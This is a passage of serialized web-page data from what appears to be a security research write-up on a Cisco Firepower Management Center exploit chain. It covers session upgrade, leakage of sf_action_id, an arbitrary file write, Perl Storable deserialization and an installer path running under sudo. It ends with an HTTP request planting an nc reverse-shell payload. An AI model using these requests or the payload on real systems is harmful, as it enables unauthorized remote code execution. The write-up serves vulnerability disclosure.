43\n",[1471,4672,4673,4675,4677],{"class":1473,"line":1546},[1471,4674,3849],{"class":3163},[1471,4676,1447],{"class":2247},[1471,4678,3854],{"class":1527},[1471,4680,4681,4684,4686],{"class":1473,"line":1580},[1471,4682,4683],{"class":3163},"Origin",[1471,4685,1447],{"class":2247},[1471,4687,4688],{"class":1527}," https:\u002F\u002F10.0.0.226\n",[1471,4690,4691,4693,4695],{"class":1473,"line":1612},[1471,4692,3254],{"class":3163},[1471,4694,1447],{"class":2247},[1471,4696,4048],{"class":1527},[1471,4698,4699,4701,4703],{"class":1473,"line":1624},[1471,4700,3174],{"class":3163},[1471,4702,1447],{"class":2247},[1471,4704,3179],{"class":1527},[1471,4706,4707,4709,4711],{"class":1473,"line":1648},[1471,4708,3876],{"class":3163},[1471,4710,1447],{"class":2247},[1471,4712,4713],{"class":1527}," 
text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\n",[1471,4715,4716,4718,4720],{"class":1473,"line":1654},[1471,4717,3194],{"class":3163},[1471,4719,1447],{"class":2247},[1471,4721,3199],{"class":1527},[1471,4723,4724],{"class":1473,"line":1662},[1471,4725,3383],{"emptyLinePlaceholder":54},[1471,4727,4728],{"class":1473,"line":1673},[1471,4729,4730],{"class":1487},"username=report&password=snortrules&target=\n",[184,4732,4733,4734,4736,4737,4740,4741,4743,4744,1447],{},"The session values in the database are upgraded, and the server responds with a successful authentication that redirects to the UI ",[1277,4735,55],{}," and a ",[1277,4738,4739],{}," header set to the already established (but now upgraded) ",[1277,4742,3127],{},". The session now has more session values set, including the necessary ",[1277,4745,1306],{},[1449,4747,4749],{"className":2232,"code":4748,"language":2234,"meta":148,"style":148},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions WHERE id='csm_processes';\n| $D = {'useruuid' => '616931da-e3df-11dc-8002-930b8c1d4d5e','user_access_type' => 0,'_SESSION_ID' => 'csm_processes','last_csm_refresh' => 1773962941,'current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','VMS_SESSION_ID' => 'csm_processes','_SESSION_ATIME' => 1773962943,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','username' => 'report','_SESSION_CTIME' => 1773962523,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'_SESSION_REMOTE_ADDR' => '','usertype' => 1,'_SESSION_ETIME' => 3900,'session_expire_check' => 1,'last_login' => {'remote_host_ip' => '10.0.1.10','last_login_time' => 1773951618},'sf_action_id' => 'fe8b71b0344419ae464328a578a12902','active' => 0};;$D 
|\n",[1277,4750,4751,4785],{"__ignoreMap":148},[1471,4752,4753,4755,4757,4759,4761,4763,4765,4767,4769,4772,4775,4777,4779,4781,4783],{"class":1473,"line":1474},[1471,4754,2241],{"class":1487},[1471,4756,2244],{"class":1516},[1471,4758,2248],{"class":2247},[1471,4760,2251],{"class":1487},[1471,4762,2254],{"class":2247},[1471,4764,2258],{"class":2257},[1471,4766,1201],{"class":1487},[1471,4768,2263],{"class":2257},[1471,4770,4771],{"class":2247}," WHERE",[1471,4773,4774],{"class":1487}," id",[1471,4776,2278],{"class":1516},[1471,4778,1524],{"class":1523},[1471,4780,1279],{"class":1527},[1471,4782,1524],{"class":1523},[1471,4784,1770],{"class":1487},[1471,4786,4787,4789,4791,4793,4795,4797,4799,4801,4803,4806,4808,4810,4812,4814,4816,4818,4820,4822,4824,4826,4828,4830,4832,4834,4836,4838,4840,4842,4844,4846,4849,4851,4853,4855,4857,4859,4861,4863,4865,4867,4869,4871,4873,4875,4877,4879,4881,4883,4885,4887,4889,4891,4894,4896,4898,4900,4902,4904,4906,4908,4910,4912,4914,4916,4918,4920,4922,4924,4926,4928,4930,4932,4934,4936,4938,4940,4942,4944,4946,4948,4950,4952,4954,4956,4958,4960,4962,4964,4966,4968,4970,4972,4974,4976,4978,4980,4982,4984,4986,4988,4990,4992,4994,4996,4998,5000,5002,5004,5006,5008,5010,5012,5014,5016,5018,5020,5022,5024,5026,5028,5030,5032,5034,5036,5038,5040,5042,5044,5047,5049,5051,5053,5055,5057,5059,5062,5064,5066,5068,5070,5072,5074,5076],{"class":1473,"line":149},[1471,4788,2275],{"class":1487},[1471,4790,2278],{"class":1516},[1471,4792,2281],{"class":1487},[1471,4794,1524],{"class":1523},[1471,4796,2336],{"class":1527},[1471,4798,1524],{"class":1523},[1471,4800,1844],{"class":1516},[1471,4802,1569],{"class":1523},[1471,4804,4805],{"class":1527},"616931da-e3df-11dc-8002-930b8c1d4d5e",[1471,4807,1524],{"class":1523},[1471,4809,2298],{"class":1487},[1471,4811,1524],{"class":1523},[1471,4813,2684],{"class":1527},[1471,4815,1524],{"class":1523},[1471,4817,1844],{"class":1516},[1471,4819,2418],{"class":2328},[1471,4821,2298],{"class":1487},[1471,48
23,1524],{"class":1523},[1471,4825,2394],{"class":1527},[1471,4827,1524],{"class":1523},[1471,4829,1844],{"class":1516},[1471,4831,1569],{"class":1523},[1471,4833,1279],{"class":1527},[1471,4835,1524],{"class":1523},[1471,4837,2298],{"class":1487},[1471,4839,1524],{"class":1523},[1471,4841,2572],{"class":1527},[1471,4843,1524],{"class":1523},[1471,4845,1844],{"class":1516},[1471,4847,4848],{"class":2328}," 1773962941",[1471,4850,2298],{"class":1487},[1471,4852,1524],{"class":1523},[1471,4854,2468],{"class":1527},[1471,4856,1524],{"class":1523},[1471,4858,1844],{"class":1516},[1471,4860,1569],{"class":1523},[1471,4862,2312],{"class":1527},[1471,4864,1524],{"class":1523},[1471,4866,2298],{"class":1487},[1471,4868,1524],{"class":1523},[1471,4870,2451],{"class":1527},[1471,4872,1524],{"class":1523},[1471,4874,1844],{"class":1516},[1471,4876,1569],{"class":1523},[1471,4878,1279],{"class":1527},[1471,4880,1524],{"class":1523},[1471,4882,2298],{"class":1487},[1471,4884,1524],{"class":1523},[1471,4886,2381],{"class":1527},[1471,4888,1524],{"class":1523},[1471,4890,1844],{"class":1516},[1471,4892,4893],{"class":2328}," 
1773962943",[1471,4895,2298],{"class":1487},[1471,4897,1524],{"class":1523},[1471,4899,2303],{"class":1527},[1471,4901,1524],{"class":1523},[1471,4903,1844],{"class":1516},[1471,4905,1569],{"class":1523},[1471,4907,2312],{"class":1527},[1471,4909,1524],{"class":1523},[1471,4911,2298],{"class":1487},[1471,4913,1524],{"class":1523},[1471,4915,1726],{"class":1527},[1471,4917,1524],{"class":1523},[1471,4919,1844],{"class":1516},[1471,4921,1569],{"class":1523},[1471,4923,1920],{"class":1527},[1471,4925,1524],{"class":1523},[1471,4927,2298],{"class":1487},[1471,4929,1524],{"class":1523},[1471,4931,2367],{"class":1527},[1471,4933,1524],{"class":1523},[1471,4935,1844],{"class":1516},[1471,4937,2374],{"class":2328},[1471,4939,2298],{"class":1487},[1471,4941,1524],{"class":1523},[1471,4943,2439],{"class":1527},[1471,4945,1524],{"class":1523},[1471,4947,1844],{"class":1516},[1471,4949,2281],{"class":1487},[1471,4951,1524],{"class":1523},[1471,4953,2321],{"class":1527},[1471,4955,1524],{"class":1523},[1471,4957,1844],{"class":1516},[1471,4959,2647],{"class":2328},[1471,4961,2650],{"class":1487},[1471,4963,1524],{"class":1523},[1471,4965,2425],{"class":1527},[1471,4967,1524],{"class":1523},[1471,4969,1844],{"class":1516},[1471,4971,2432],{"class":1523},[1471,4973,2298],{"class":1487},[1471,4975,1524],{"class":1523},[1471,4977,1528],{"class":1527},[1471,4979,1524],{"class":1523},[1471,4981,1844],{"class":1516},[1471,4983,2329],{"class":2328},[1471,4985,2298],{"class":1487},[1471,4987,1524],{"class":1523},[1471,4989,2889],{"class":1527},[1471,4991,1524],{"class":1523},[1471,4993,1844],{"class":1516},[1471,4995,2896],{"class":2328},[1471,4997,2298],{"class":1487},[1471,4999,1524],{"class":1523},[1471,5001,2321],{"class":1527},[1471,5003,1524],{"class":1523},[1471,5005,1844],{"class":1516},[1471,5007,2329],{"class":2328},[1471,5009,2298],{"class":1487},[1471,5011,1524],{"class":1523},[1471,5013,2702],{"class":1527},[1471,5015,1524],{"class":1523},[1471,5017,1844],{"class":1516},[147
1,5019,2281],{"class":1487},[1471,5021,1524],{"class":1523},[1471,5023,2727],{"class":1527},[1471,5025,1524],{"class":1523},[1471,5027,1844],{"class":1516},[1471,5029,1569],{"class":1523},[1471,5031,2736],{"class":1527},[1471,5033,1524],{"class":1523},[1471,5035,2298],{"class":1487},[1471,5037,1524],{"class":1523},[1471,5039,2713],{"class":1527},[1471,5041,1524],{"class":1523},[1471,5043,1844],{"class":1516},[1471,5045,5046],{"class":2328}," 1773951618",[1471,5048,2650],{"class":1487},[1471,5050,1524],{"class":1523},[1471,5052,1306],{"class":1527},[1471,5054,1524],{"class":1523},[1471,5056,1844],{"class":1516},[1471,5058,1569],{"class":1523},[1471,5060,5061],{"class":1527},"fe8b71b0344419ae464328a578a12902",[1471,5063,1524],{"class":1523},[1471,5065,2298],{"class":1487},[1471,5067,1524],{"class":1523},[1471,5069,2411],{"class":1527},[1471,5071,1524],{"class":1523},[1471,5073,1844],{"class":1516},[1471,5075,2418],{"class":2328},[1471,5077,2481],{"class":1487},[184,5079,5080,5081,5084,5085,5088],{},"Another redirect to ",[1277,5082,5083],{},"\u002Fui\u002Fuser\u002Fgeneral"," can be followed, and then the FMC \"DDD\" logic renders a UI template containing a call to the template ",[1277,5086,5087],{},"SF::Auth::getSFActionID()"," that renders that session value on the page:",[1449,5090,5094],{"className":5091,"code":5092,"language":5093,"meta":148,"style":148},"language-html shiki shiki-themes material-theme-lighter github-light github-dark monokai","...snip...\n  \u003C!-- Global variables and functions -->\n    \u003Cscript type=\"text\u002Fjavascript\">\n      var sf_action_id = \"fe8b71b0344419ae464328a578a12902\";\n      var __prefetch = 
{\"capabilities\":{\"hideMenuForOnbox\":0,\"isLamplighterEnabled\":0,\"isOnboxManaged\":0,\"showDeployDialog\":0,\"isStandbyDC\":\"0\",\"isExternalStorageEnabled\":0,\"isWorkflowEnabled\":1,\"isSyslogAllLogsToFmc\":1,\"activityId\":0,\"isCDODeployment\":0,\"isNATExemptEnabled\":1,\"isUM\":1,\"isChangeMgmtWorkflowEnabled\":0,\"exposeDNSReputationEnforcement\":1},\"static\":{\"locale\":\"en_US\",\"SF::MultiTenancy::isDomainObjInfoVisible\":{\"isDomainInfoVisible\":0}}};\n      \u002F\u002F Backdraft integration\n            var BackdraftSyncIntegration = (function() {\n        var currentHelpTopic = undefined;\n        var navMap = {};\n...snip...\n","html",[1277,5095,5096,5100,5105,5128,5146,5404,5409,5428,5444,5456],{"__ignoreMap":148},[1471,5097,5098],{"class":1473,"line":1474},[1471,5099,3647],{"class":1487},[1471,5101,5102],{"class":1473,"line":149},[1471,5103,5104],{"class":1477},"  \u003C!-- Global variables and functions -->\n",[1471,5106,5107,5110,5113,5117,5119,5121,5124,5126],{"class":1473,"line":1498},[1471,5108,5109],{"class":1491},"    \u003C",[1471,5111,5112],{"class":3163},"script",[1471,5114,5116],{"class":5115},"s_lYk"," type",[1471,5118,2278],{"class":1491},[1471,5120,1767],{"class":1523},[1471,5122,5123],{"class":1527},"text\u002Fjavascript",[1471,5125,1767],{"class":1523},[1471,5127,3628],{"class":1491},[1471,5129,5130,5133,5136,5138,5140,5142,5144],{"class":1473,"line":1536},[1471,5131,5132],{"class":4157},"      var",[1471,5134,5135],{"class":1487}," sf_action_id 
",[1471,5137,2278],{"class":1516},[1471,5139,1739],{"class":1523},[1471,5141,5061],{"class":1527},[1471,5143,1767],{"class":1523},[1471,5145,1770],{"class":1491},[1471,5147,5148,5150,5153,5155,5157,5159,5163,5165,5168,5170,5173,5175,5177,5179,5181,5183,5186,5188,5190,5192,5194,5196,5199,5201,5203,5205,5207,5209,5212,5214,5216,5218,5220,5222,5225,5227,5229,5231,5233,5235,5237,5239,5242,5244,5246,5248,5250,5252,5255,5257,5259,5261,5263,5265,5268,5270,5272,5274,5276,5278,5281,5283,5285,5287,5289,5291,5294,5296,5298,5300,5302,5304,5307,5309,5311,5313,5315,5317,5320,5322,5324,5326,5328,5330,5333,5335,5337,5339,5341,5343,5346,5348,5350,5352,5354,5356,5359,5361,5363,5365,5368,5370,5372,5374,5377,5379,5381,5383,5386,5388,5390,5392,5395,5397,5399,5401],{"class":1473,"line":1546},[1471,5149,5132],{"class":4157},[1471,5151,5152],{"class":1487}," __prefetch ",[1471,5154,2278],{"class":1516},[1471,5156,2281],{"class":1491},[1471,5158,1767],{"class":1523},[1471,5160,5162],{"class":5161},"sJhdN","capabilities",[1471,5164,1767],{"class":1523},[1471,5166,5167],{"class":1491},":{",[1471,5169,1767],{"class":1523},[1471,5171,5172],{"class":5161},"hideMenuForOnbox",[1471,5174,1767],{"class":1523},[1471,5176,1447],{"class":1491},[1471,5178,2502],{"class":2328},[1471,5180,2298],{"class":1491},[1471,5182,1767],{"class":1523},[1471,5184,5185],{"class":5161},"isLamplighterEnabled",[1471,5187,1767],{"class":1523},[1471,5189,1447],{"class":1491},[1471,5191,2502],{"class":2328},[1471,5193,2298],{"class":1491},[1471,5195,1767],{"class":1523},[1471,5197,5198],{"class":5161},"isOnboxManaged",[1471,5200,1767],{"class":1523},[1471,5202,1447],{"class":1491},[1471,5204,2502],{"class":2328},[1471,5206,2298],{"class":1491},[1471,5208,1767],{"class":1523},[1471,5210,5211],{"class":5161},"showDeployDialog",[1471,5213,1767],{"class":1523},[1471,5215,1447],{"class":1491},[1471,5217,2502],{"class":2328},[1471,5219,2298],{"class":1491},[1471,5221,1767],{"class":1523},[1471,5223,5224],{"class":5161},"isStandby
DC",[1471,5226,1767],{"class":1523},[1471,5228,1447],{"class":1491},[1471,5230,1767],{"class":1523},[1471,5232,2502],{"class":1527},[1471,5234,1767],{"class":1523},[1471,5236,2298],{"class":1491},[1471,5238,1767],{"class":1523},[1471,5240,5241],{"class":5161},"isExternalStorageEnabled",[1471,5243,1767],{"class":1523},[1471,5245,1447],{"class":1491},[1471,5247,2502],{"class":2328},[1471,5249,2298],{"class":1491},[1471,5251,1767],{"class":1523},[1471,5253,5254],{"class":5161},"isWorkflowEnabled",[1471,5256,1767],{"class":1523},[1471,5258,1447],{"class":1491},[1471,5260,454],{"class":2328},[1471,5262,2298],{"class":1491},[1471,5264,1767],{"class":1523},[1471,5266,5267],{"class":5161},"isSyslogAllLogsToFmc",[1471,5269,1767],{"class":1523},[1471,5271,1447],{"class":1491},[1471,5273,454],{"class":2328},[1471,5275,2298],{"class":1491},[1471,5277,1767],{"class":1523},[1471,5279,5280],{"class":5161},"activityId",[1471,5282,1767],{"class":1523},[1471,5284,1447],{"class":1491},[1471,5286,2502],{"class":2328},[1471,5288,2298],{"class":1491},[1471,5290,1767],{"class":1523},[1471,5292,5293],{"class":5161},"isCDODeployment",[1471,5295,1767],{"class":1523},[1471,5297,1447],{"class":1491},[1471,5299,2502],{"class":2328},[1471,5301,2298],{"class":1491},[1471,5303,1767],{"class":1523},[1471,5305,5306],{"class":5161},"isNATExemptEnabled",[1471,5308,1767],{"class":1523},[1471,5310,1447],{"class":1491},[1471,5312,454],{"class":2328},[1471,5314,2298],{"class":1491},[1471,5316,1767],{"class":1523},[1471,5318,5319],{"class":5161},"isUM",[1471,5321,1767],{"class":1523},[1471,5323,1447],{"class":1491},[1471,5325,454],{"class":2328},[1471,5327,2298],{"class":1491},[1471,5329,1767],{"class":1523},[1471,5331,5332],{"class":5161},"isChangeMgmtWorkflowEnabled",[1471,5334,1767],{"class":1523},[1471,5336,1447],{"class":1491},[1471,5338,2502],{"class":2328},[1471,5340,2298],{"class":1491},[1471,5342,1767],{"class":1523},[1471,5344,5345],{"class":5161},"exposeDNSReputationEnforcement",[1471,5347,1767]
,{"class":1523},[1471,5349,1447],{"class":1491},[1471,5351,454],{"class":2328},[1471,5353,2650],{"class":1491},[1471,5355,1767],{"class":1523},[1471,5357,5358],{"class":5161},"static",[1471,5360,1767],{"class":1523},[1471,5362,5167],{"class":1491},[1471,5364,1767],{"class":1523},[1471,5366,5367],{"class":5161},"locale",[1471,5369,1767],{"class":1523},[1471,5371,1447],{"class":1491},[1471,5373,1767],{"class":1523},[1471,5375,5376],{"class":1527},"en_US",[1471,5378,1767],{"class":1523},[1471,5380,2298],{"class":1491},[1471,5382,1767],{"class":1523},[1471,5384,5385],{"class":5161},"SF::MultiTenancy::isDomainObjInfoVisible",[1471,5387,1767],{"class":1523},[1471,5389,5167],{"class":1491},[1471,5391,1767],{"class":1523},[1471,5393,5394],{"class":5161},"isDomainInfoVisible",[1471,5396,1767],{"class":1523},[1471,5398,1447],{"class":1491},[1471,5400,2502],{"class":2328},[1471,5402,5403],{"class":1491},"}}};\n",[1471,5405,5406],{"class":1473,"line":1580},[1471,5407,5408],{"class":1477},"      \u002F\u002F Backdraft integration\n",[1471,5410,5411,5414,5417,5419,5421,5424,5426],{"class":1473,"line":1612},[1471,5412,5413],{"class":4157},"            var",[1471,5415,5416],{"class":1487}," BackdraftSyncIntegration ",[1471,5418,2278],{"class":1516},[1471,5420,1488],{"class":1487},[1471,5422,5423],{"class":4157},"function",[1471,5425,4378],{"class":1491},[1471,5427,1621],{"class":1491},[1471,5429,5430,5433,5436,5439,5442],{"class":1473,"line":1624},[1471,5431,5432],{"class":4157},"        var",[1471,5434,5435],{"class":1487}," currentHelpTopic",[1471,5437,5438],{"class":1516}," =",[1471,5440,5441],{"class":3917}," undefined",[1471,5443,1770],{"class":1491},[1471,5445,5446,5448,5451,5453],{"class":1473,"line":1648},[1471,5447,5432],{"class":4157},[1471,5449,5450],{"class":1487}," navMap",[1471,5452,5438],{"class":1516},[1471,5454,5455],{"class":1491}," 
{};\n",[1471,5457,5458,5461,5464],{"class":1473,"line":1654},[1471,5459,5460],{"class":1516},"...",[1471,5462,5463],{"class":1487},"snip",[1471,5465,5466],{"class":1516},"...\n",[184,5468,5469,5470,5472,5473,5475,5476,5478,5479,1201],{},"Now that a ",[1277,5471,1306],{}," is accessible, we can make calls to the previous ",[1277,5474,1329],{}," and ",[1277,5477,3784],{}," endpoints with the retrieved ",[1277,5480,1306],{},[246,5482,5484],{"id":5483},"a-variety-of-scripts-and-commands","A Variety of Scripts and Commands",[184,5486,5487],{},"Now that we can finally reach the CGI scripts and call them, the team crawled through these functions looking for primitives to use. We identified three useful calls:",[2493,5489,5490,5507,5543],{},[230,5491,5492,5493,5495,5496,5499,5500,5502,5503,5506],{},"An arbitrary write via ",[1277,5494,3784],{}," using the ",[1277,5497,5498],{},"validateLicense"," call that will take arbitrary data and write it to ",[1277,5501,1322],{},". Binary data can be written to that by providing JSON Unicode-escaped values, such as ",[1277,5504,5505],{},"\\u000a"," for newlines.",[230,5508,5509,5510,5495,5512,5515,5516,5519,5520,5523,5524,5526,5527,5530,5531,5534,5535,5538,5539,5542],{},"An arbitrary Perl Storable deserialization via ",[1277,5511,3784],{},[1277,5513,5514],{},"batchResult"," function call that allows a path traversal to ",[1277,5517,5518],{},"..\u002Flicense.tmp",", and then will call ",[1277,5521,5522],{},"\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," and the ",[1277,5525,5514],{}," function that contains another call to ",[1277,5528,5529],{},"SF::Util::DeSerialize"," that finally calls ",[1277,5532,5533],{},"Storable::retrieve"," (with the unsafe ",[1277,5536,5537],{},"local $Storable::Eval = $Storable::Eval = 1;"," setting). 
It's likely that this is exploitable to directly achieve RCE, but no usable ",[1277,5540,5541],{},"STORABLE_thaw"," gadgets were found during testing.",[230,5544,5545,5546,5548,5549,5551,5552,5555],{},"An upgrade package installer function call to ",[1277,5547,1333],{}," via the ",[1277,5550,1329],{}," code and a set of options pointing to the ",[1277,5553,5554],{},"license.tmp"," file that validates a large set of parameters and options, but can be used to run \"installable\" package types provided by Cisco.",[184,5557,5558,5559,5562,5563,5566],{},"The update types can be checked in ",[1277,5560,5561],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUpdate.pm"," with the ",[1277,5564,5565],{},"GetUpdateFileType"," that checks the first 1024 bytes and assigns a type to the \"install\" file:",[227,5568,5569,5575,5581,5587,5593,5603,5612,5621,5627],{},[230,5570,5571,5574],{},[1277,5572,5573],{},"EMPTY"," - empty",[230,5576,5577,5580],{},[1277,5578,5579],{},"GPG"," - GPG-signed install package",[230,5582,5583,5586],{},[1277,5584,5585],{},"RPM"," - an RPM package",[230,5588,5589,5592],{},[1277,5590,5591],{},"TARBALL_XZ"," - an XZ-compressed tarball file",[230,5594,5595,5598,5599,5602],{},[1277,5596,5597],{},"BUNDLE"," - a custom Cisco install format that contains a ",[1277,5600,5601],{},"bundle.tar"," file",[230,5604,5605,5608,5609],{},[1277,5606,5607],{},"SCRIPT"," - A shell script that contains ",[1277,5610,5611],{},"#!\u002Fbin\u002Fsh",[230,5613,5614,5617,5618],{},[1277,5615,5616],{},"MAKESELF"," - A shell script that also contains the hardcoded string ",[1277,5619,5620],{},"# This script was generated using Makeself",[230,5622,5623,5626],{},[1277,5624,5625],{},"STUB"," - a split stub JSON file",[230,5628,5629,5632],{},[1277,5630,5631],{},"UNKNOWN"," - Anything 
else",[184,5634,1292,5635,5638,5639,5642,5643,5645,5646,5648,5649,5651,5652,5655,5656,5659,5660,5663,5664,5667,5668,5671,5672,5675,5676,5679,5680,5682,5683,5686,5687,5690,5691,5694],{},[1277,5636,5637],{},"upgradeReadinessCall"," will only reach the ",[1277,5640,5641],{},"Install"," logic under a subset of these types, and the trivial ",[1277,5644,5607],{}," will not work for basic execution. Luckily, ",[1277,5647,5616],{}," is also just a shell script with a slightly different format and a hardcoded string. The ",[1277,5650,5637],{}," will validate a few UUID parameters and the filetype before passing it to ",[1277,5653,5654],{},"SF::Update::readinessInstall"," that calls ",[1277,5657,5658],{},"SF::Update::GetUpdateFileInfo",", runs a ",[1374,5661,5662],{},"large"," set of checks, and then triggers ",[1277,5665,5666],{},"SF::Update::Install"," on the file. That in turn calls ",[1277,5669,5670],{},"SF::Update::Install::_aqInstallTask"," that does disk space checks, validates signatures, performs a few more checks, and then queues the task into ",[1277,5673,5674],{},"SF::System::Privileged::InstallUpdate"," with the filename. 
This package ",[1374,5677,5678],{},"finally"," calls ",[1277,5681,1343],{},", which ironically checks whether the caller was run from ",[1277,5684,5685],{},"SF::System"," — and if so, it marks the first command argument to be ",[1277,5688,5689],{},"\u002Fusr\u002Fbin\u002Fsudo"," and runs the following ",[1277,5692,5693],{},"eval"," indicating code execution can be achieved:",[1449,5696,5698],{"className":1465,"code":5697,"language":1467,"meta":148,"style":148},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n# chance of someone inputting commands\nopen(SFNULL, \"\u002Fdev\u002Fnull\");\n\nwarn Dumper($dumpcmd) if $DEBUG;\n\n# Traps exceptions for the open call.\neval\n{\n    $pid = open3(*SFNULL, *OUTH, *ERRH, @$cmd);\n};\n\n",[1277,5699,5700,5705,5710,5727,5731,5751,5755,5760,5765,5770,5782],{"__ignoreMap":148},[1471,5701,5702],{"class":1473,"line":1474},[1471,5703,5704],{"class":1477},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n",[1471,5706,5707],{"class":1473,"line":149},[1471,5708,5709],{"class":1477},"# chance of someone inputting commands\n",[1471,5711,5712,5715,5718,5720,5723,5725],{"class":1473,"line":1498},[1471,5713,5714],{"class":1554},"open",[1471,5716,5717],{"class":1487},"(SFNULL, ",[1471,5719,1767],{"class":1523},[1471,5721,5722],{"class":1527},"\u002Fdev\u002Fnull",[1471,5724,1767],{"class":1523},[1471,5726,1533],{"class":1487},[1471,5728,5729],{"class":1473,"line":1536},[1471,5730,3383],{"emptyLinePlaceholder":54},[1471,5732,5733,5736,5739,5741,5744,5746,5748],{"class":1473,"line":1546},[1471,5734,5735],{"class":1554},"warn",[1471,5737,5738],{"class":1487}," Dumper(",[1471,5740,1492],{"class":1491},[1471,5742,5743],{"class":1487},"dumpcmd) ",[1471,5745,1484],{"class":1483},[1471,5747,1505],{"class":1491},[1471,5749,5750],{"class":1487},"DEBUG;\n",[1471,5752,5753],{"class":1473,"line":1580},[1471,5754,3383],{"emptyLinePlaceholder":54},[1471,5756,5757],{"class":1473,"line":1612},[1471,5758,5759],{"class":1477},"# Traps exceptions 
for the open call.\n",[1471,5761,5762],{"class":1473,"line":1624},[1471,5763,5764],{"class":1483},"eval\n",[1471,5766,5767],{"class":1473,"line":1648},[1471,5768,5769],{"class":1487},"{\n",[1471,5771,5772,5774,5777,5779],{"class":1473,"line":1654},[1471,5773,4226],{"class":1491},[1471,5775,5776],{"class":1487},"pid = open3(*SFNULL, *OUTH, *ERRH, ",[1471,5778,4182],{"class":1491},[1471,5780,5781],{"class":1487},"$cmd);\n",[1471,5783,5784],{"class":1473,"line":1662},[1471,5785,5786],{"class":1487},"};\n",[184,5788,5789],{},"The full process of this path execution from the file write is as follows:",[184,5791,5792,5793,5795,5796,5799,5800,5802,5803,5805,5806,5809],{},"The file write to ",[1277,5794,3784],{}," is called with the ",[1277,5797,5798],{},"callServerFunc"," URL parameter and an arbitrary Unix timestamp; then the body content is the JSON array containing an ordered array of parameters. In our case, we call the ",[1277,5801,5498],{}," function and place our payload in a ",[1277,5804,5616],{}," validating script that uses the JSON Unicode-escaped format for any newline characters (normal ",[1277,5807,5808],{},"\\n"," will not validate, and arbitrary binary data can actually be written to the file with this technique):",[1449,5811,5813],{"className":3138,"code":5812,"language":3140,"meta":148,"style":148},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 216\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nOrigin: https:\u002F\u002F10.0.0.226\nReferer: https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\nConnection: keep-alive\n\n\n[\n\"2c33d78906e48adf429099629b0e1acf\",\n\"validateLicense\",\n\"#!\u002Fbin\u002Fsh\\u000A# This script was generated using Makeself\\u000A\\u000Arm \u002Ftmp\u002Ff;mkfifo 
\u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\u000A\"]\n",[1277,5814,5815,5828,5836,5844,5853,5861,5869,5877,5885,5895,5903,5907,5911,5916,5928,5938],{"__ignoreMap":148},[1471,5816,5817,5819,5822,5824,5826],{"class":1473,"line":1474},[1471,5818,3809],{"class":1483},[1471,5820,5821],{"class":1487}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 ",[1471,5823,3153],{"class":2247},[1471,5825,55],{"class":1487},[1471,5827,3158],{"class":2328},[1471,5829,5830,5832,5834],{"class":1473,"line":149},[1471,5831,3164],{"class":3163},[1471,5833,1447],{"class":2247},[1471,5835,3169],{"class":1527},[1471,5837,5838,5840,5842],{"class":1473,"line":1498},[1471,5839,3428],{"class":3163},[1471,5841,1447],{"class":2247},[1471,5843,3433],{"class":1527},[1471,5845,5846,5848,5850],{"class":1473,"line":1536},[1471,5847,3274],{"class":3163},[1471,5849,1447],{"class":2247},[1471,5851,5852],{"class":1527}," 216\n",[1471,5854,5855,5857,5859],{"class":1473,"line":1546},[1471,5856,3254],{"class":3163},[1471,5858,1447],{"class":2247},[1471,5860,3863],{"class":1527},[1471,5862,5863,5865,5867],{"class":1473,"line":1580},[1471,5864,3174],{"class":3163},[1471,5866,1447],{"class":2247},[1471,5868,3179],{"class":1527},[1471,5870,5871,5873,5875],{"class":1473,"line":1612},[1471,5872,3876],{"class":3163},[1471,5874,1447],{"class":2247},[1471,5876,3881],{"class":1527},[1471,5878,5879,5881,5883],{"class":1473,"line":1624},[1471,5880,4683],{"class":3163},[1471,5882,1447],{"class":2247},[1471,5884,4688],{"class":1527},[1471,5886,5887,5890,5892],{"class":1473,"line":1648},[1471,5888,5889],{"class":3163},"Referer",[1471,5891,1447],{"class":2247},[1471,5893,5894],{"class":1527}," 
https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\n",[1471,5896,5897,5899,5901],{"class":1473,"line":1654},[1471,5898,3194],{"class":3163},[1471,5900,1447],{"class":2247},[1471,5902,3199],{"class":1527},[1471,5904,5905],{"class":1473,"line":1662},[1471,5906,3383],{"emptyLinePlaceholder":54},[1471,5908,5909],{"class":1473,"line":1673},[1471,5910,3383],{"emptyLinePlaceholder":54},[1471,5912,5913],{"class":1473,"line":1681},[1471,5914,5915],{"class":1491},"[\n",[1471,5917,5918,5920,5923,5925],{"class":1473,"line":1691},[1471,5919,1767],{"class":1523},[1471,5921,5922],{"class":1527},"2c33d78906e48adf429099629b0e1acf",[1471,5924,1767],{"class":1523},[1471,5926,5927],{"class":1491},",\n",[1471,5929,5930,5932,5934,5936],{"class":1473,"line":1699},[1471,5931,1767],{"class":1523},[1471,5933,5498],{"class":1527},[1471,5935,1767],{"class":1523},[1471,5937,5927],{"class":1491},[1471,5939,5940,5942,5944,5947,5949,5952,5955,5957,5959],{"class":1473,"line":1705},[1471,5941,1767],{"class":1523},[1471,5943,5611],{"class":1527},[1471,5945,5946],{"class":2257},"\\u000A",[1471,5948,5620],{"class":1527},[1471,5950,5951],{"class":2257},"\\u000A\\u000A",[1471,5953,5954],{"class":1527},"rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 